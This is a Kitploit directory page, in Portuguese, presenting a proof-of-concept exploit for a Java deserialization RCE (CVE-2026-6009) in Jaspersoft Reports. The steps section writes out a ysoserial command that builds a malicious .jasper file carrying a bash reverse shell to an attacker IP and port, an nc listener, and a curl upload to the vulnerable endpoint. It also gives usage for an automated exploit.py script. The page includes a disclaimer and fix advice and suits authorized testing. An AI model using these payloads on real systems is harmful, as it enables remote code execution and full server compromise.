Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6009 — Exploit PoC automatizado para CVE-2026-6009, uma RCE por desserialização Java no Jaspersoft Reports <=7.0.3. Gera payloads .jasper maliciosos via ysoserial e entrega reverse shell através do endpoint de upload de arquivos. | Kitploit
Ferramentas/GitHubGitHub/pumila03/cve-2026-6009
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubpumila03/cve-2026-6009

CVE-2026-6009

Exploit PoC automatizado para CVE-2026-6009, uma RCE por desserialização Java no Jaspersoft Reports <=7.0.3. Gera payloads .jasper maliciosos via ysoserial e entrega reverse shell através do endpoint de upload de arquivos.

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ Aviso: Este repositório é apenas para fins educacionais e testes de segurança autorizados. Não utilize contra sistemas que não sejam de sua propriedade ou para os quais você não tenha permissão explícita por escrito.

CVE-2026-6009

Prova de Conceito

Resumo

A biblioteca Jaspersoft report versão <= 7.0.3 é vulnerável a uma execução remota de código (RCE) explorando o fluxo de desserialização Java. Essa vulnerabilidade permite que um atacante realize uma conexão com um reverse shell no sistema que utiliza esta versão da biblioteca.

  • Biblioteca: Jaspersoft report
  • Versão afetada: <= 7.0.3
  • Tipo de vulnerabilidade: RCE via desserialização Java
  • CVE-2026-6009
  • Pontuação CVSS: 8.7 (Alta)
  • Data: 2026-05-19

Descrição da vulnerabilidade

Para transmitir dados, alguns sistemas precisam converter objetos em um formato transmissível específico, isso é a serialização. A desserialização é a operação inversa. Em Java, o mecanismo vulnerável está em ObjectInputStream.readObject(), que é usado para desserializar qualquer objeto a partir de um fluxo de entrada. Como utiliza este método para ler arquivos de relatório na biblioteca Jaspersoft, é um ponto de entrada perigoso para inserir código malicioso.

JRLoader.loadObject()
.jasper

Apenas readObject() não é suficiente para acionar o código. Ele só funciona em classes conhecidas exploráveis. Então os atacantes utilizam gadget chains conhecidas, como CommonCollection, para executar seus payloads.

Ambiente

Para ser capaz de fazer uma Prova de Conceito (PoC), montei um laboratório em uma máquina Parrot com um servidor Web Java utilizando a Biblioteca Jaspersoft Report:

SO: Parrot OS 7 GNU/Linux Framework: Spring Boot versão 2.7.18 Dependência: Jasperreports versão 7.0.3 Ambiente: Java 11 Compilador: Maven

Exemplo de código vulnerável:

root@kitploit:~
@PostMapping("/upload-report")
    public String uploadReport(@RequestParam("file") MultipartFile file) {
        try {
            InputStream is = file.getInputStream();

            // ObjectInputStream.readObject() chamado internamente por JRLoader
            JasperReport report = (JasperReport) JRLoader.loadObject(is);
            ...

Passos para reproduzir

  1. Análise

Para o primeiro passo, uma vez que você sabe que seu sistema alvo utiliza uma versão vulnerável do Jasperreport, você precisa encontrar o destino exato onde o alvo receberá o arquivo jasper.

Neste ambiente, é http://localhost:8080/upload-report

  1. Verificar a vulnerabilidade

Em seguida, você precisa encontrar uma maneira de descobrir qual classe pode ser usada como gadget chain no sistema alvo. Você também pode tentar algumas e ver qual aciona o sistema.

Em um contexto de whitebox, podemos buscar essa informação por conta própria:

root@kitploit:~
mvn dependency:tree | grep -i "commons\|spring\|groovy\|beanshell"

Descobrimos que o sistema utiliza CommonsCollections.

  1. Gerar o payload

Para CommonsCollections, utilize o script ysoserial para gerar o payload desejado. Aqui, faça um reverse shell:

root@kitploit:~
java -jar ysoserial.jar CommonsCollections5 "/bin/bash -i >& /dev/tcp/IP_SOURCE/PORT 0>&1" > file.jasper

Você provavelmente precisará testar várias versões do CommonCollections para executar o payload.

  1. Preparar o exploit

Para realizar uma conexão reverse shell, precisamos ouvir em uma porta para receber a conexão do sistema alvo iniciada pelo payload:

root@kitploit:~
nc -lnvp 4444
  1. Explorar

Finalmente, basta enviar o payload criado para o local encontrado e verificar sua porta para confirmar que a conexão foi estabelecida a partir do sistema alvo:

root@kitploit:~
curl -X POST http://localhost:8080/upload-report -F "[email protected]"

Impacto

Um atacante com acesso ao endpoint pode executar código arbitrário com privilégios de servidor, o que pode levar a um comprometimento total do sistema.

Recomendações de correção

  • Atualizar o JasperReports para a versão 7.0.4+
  • Nunca desserializar arquivos .jasper de fonte desconhecida
  • Implementar lista de permissões para classes autorizadas

Script

Descrição

exploit.py é um script automatizado para reproduzir a exploração da vulnerabilidade CVE-2026-6009.

Uso

root@kitploit:~
python3 exploit.py -t TARGET -s IP_SOURCE -p PORT
python3 exploit.py -t http://localhost:8080/upload-report -s 192.168.1.1 -p 4444

Opções

FlagDescrição
-t, --targetLocalização para onde enviar o arquivo .jasper
-s, --sourceSeu endereço IP
-p, --portA porta para a qual você deseja que o reverse shell se conecte
Baixar ferramenta